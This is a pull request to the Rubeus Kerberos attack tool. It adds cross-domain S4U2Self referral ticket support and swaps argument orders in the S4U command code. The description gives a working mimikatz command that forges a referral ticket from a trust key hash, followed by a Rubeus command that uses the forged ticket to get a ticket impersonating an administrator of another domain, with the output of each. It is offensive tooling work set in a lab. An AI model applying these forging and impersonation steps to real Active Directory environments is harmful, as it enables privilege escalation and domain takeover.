### PR TITLE
some code cleanup and added support for S4U2Self referral tickets to …

### DIFF
--- a/Rubeus/Commands/S4u.cs
+++ b/Rubeus/Commands/S4u.cs
@@ -23,6 +23,7 @@ namespace Rubeus.Commands
             string dc = "";
             string targetDomain = "";
             string targetDC = "";
+            string impersonateDomain = "";
             bool self = false;
             Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial; // throwaway placeholder, changed to something valid
             KRB_CRED tgs = null;
@@ -70,6 +71,10 @@ namespace Rubeus.Commands
                     return;
                 }
                 targetUser = arguments["/impersonateuser"];
+            }
+            if (arguments.ContainsKey("/impersonatedomain"))
+            {
+                impersonateDomain = arguments["/impersonatedomain"];
             }
             if (arguments.ContainsKey("/targetdomain"))
             {
@@ -146,13 +151,13 @@ namespace Rubeus.Commands
                 {
                     byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDomain, targetDC, self);
+                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, domain, impersonateDomain);
                 }
                 else if (File.Exists(kirbi64))
                 {
                     byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDomain, targetDC, self);
+                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, domain, impersonateDomain);
                 }
                 else
                 {
@@ -172,7 +177,7 @@ namespace Rubeus.Commands
                     return;
                 }
 
-                S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDomain, targetDC, self);
+                S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self);
                 return;
             }
             else

--- a/Rubeus/lib/krb_structures/TGS_REQ.cs
+++ b/Rubeus/lib/krb_structures/TGS_REQ.cs
@@ -170,7 +170,7 @@ namespace Rubeus
         }
 
         // maybe the function above can be combined with this one?
-        public static byte[] NewTGSReq(string userName, string targetUser, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE paEType, Interop.KERB_ETYPE requestEType, bool cross = true)
+        public static byte[] NewTGSReq(string userName, string targetUser, Ticket providedTicket, byte[] clientKey, Interop.KERB_ETYPE paEType, Interop.KERB_ETYPE requestEType, bool cross = true, string requestDomain = "")
         {
             // cross domain "S4U2Self" requests
             TGS_REQ req = new TGS_REQ(cname: false);
@@ -186,7 +186,10 @@ namespace Rubeus
             // which domain is the "local" domain for this TGS
             if (cross)
             {
-                req.req_body.realm = targetDomain;
+                if (String.IsNullOrEmpty(requestDomain))
+                    requestDomain = targetDomain;
+
+                req.req_body.realm = requestDomain;
             }
             else
             {


### PR DESCRIPTION
…request an S4U2Self

Fixed some of the code for the cross domain S4U2Self where the targetdomain and targetdc arguments were the wrong way round, also changed some of the comments and output text to refer to the proper names (like referral TGT for a cross domain TGT) to be inline with the MS documentation.

Added support for passing a referral S4U2Self ticket to request a cross domain S4U2Self. This was due to some testing I was doing with these tickets, using a modified version of mimikatz, I was able to forge a referral S4U2Self ticket using the trust key:

```
mimikatz # kerberos::golden /sid:S-1-5-21-2497454771-856038897-3094711587 /user:ISQL1$ /domain:internal.zeroday.lab /service:krbtgt /target:internal.zeroday.lab /impersonateuser:external.admin /impersonatedomain:external.zeroday.lab /rc4:c73561aca0d3e23ae5463d318773504f /requestdomain:external.zeroday.lab /ticket:C:\temp\s4u2self-referral.kirbi 
User      : ISQL1$
Domain    : internal.zeroday.lab (EXTERNAL)
SID       : S-1-5-21-2497454771-856038897-3094711587
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: c73561aca0d3e23ae5463d318773504f - rc4_hmac_nt
Service   : krbtgt
Target    : internal.zeroday.lab
Lifetime  : 03/09/2020 21:49:07 ; 01/09/2030 21:49:07 ; 01/09/2030 21:49:07
-> Ticket : C:\temp\s4u2self-referral.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !
```

Here I've forged a ticket for ISQL1$ in the domain internal.zeroday.lab to impersonate the user external.admin in the domain external.zeroday.lab, using the trust key from the DC of external.zeroday.lab. Using this Rubeus modification, I'm able to use this ticket to request the final S4U2Self for the computer ISQL1:
```
C:\temp>.\Rubeus.exe s4u /self /targetdomain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab /impersonateuser:external.admin /domain:external.zeroday.lab /altservice:host/isql1.internal.zeroday.lab /nowrap /ticket:C:\temp\s4u2self-referral.kirbi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: S4U

[*] Action: S4U

[*] Using domain controller: idc1.internal.zeroday.lab (192.168.71.20)
[*] Requesting the cross realm 'S4U2Self' for external.admin@external.zeroday.lab from idc1.internal.zeroday.lab
[*] Sending cross realm S4U2Self request
[+] cross realm S4U2Self success!
[*] Substituting alternative service name 'host/isql1.internal.zeroday.lab'
[*] base64(ticket.kirbi):

      doIFETCCBQ...RheS5sYWI=
```

There's also an option /impersonatedomain, which is the domain of the user account to be impersonated, if not supplied, this will be the same as the /domain argument, which is the domain the referral ticket originated at. This means it's possible to forge requests for users of other domains, although in my tests these resulted in a policy error.

This code path triggers when /targetdomain is passed without /targetdc.

While I've not found a way to weaponize this, perhaps there might be an edge case I've not noticed where this functionality could be useful.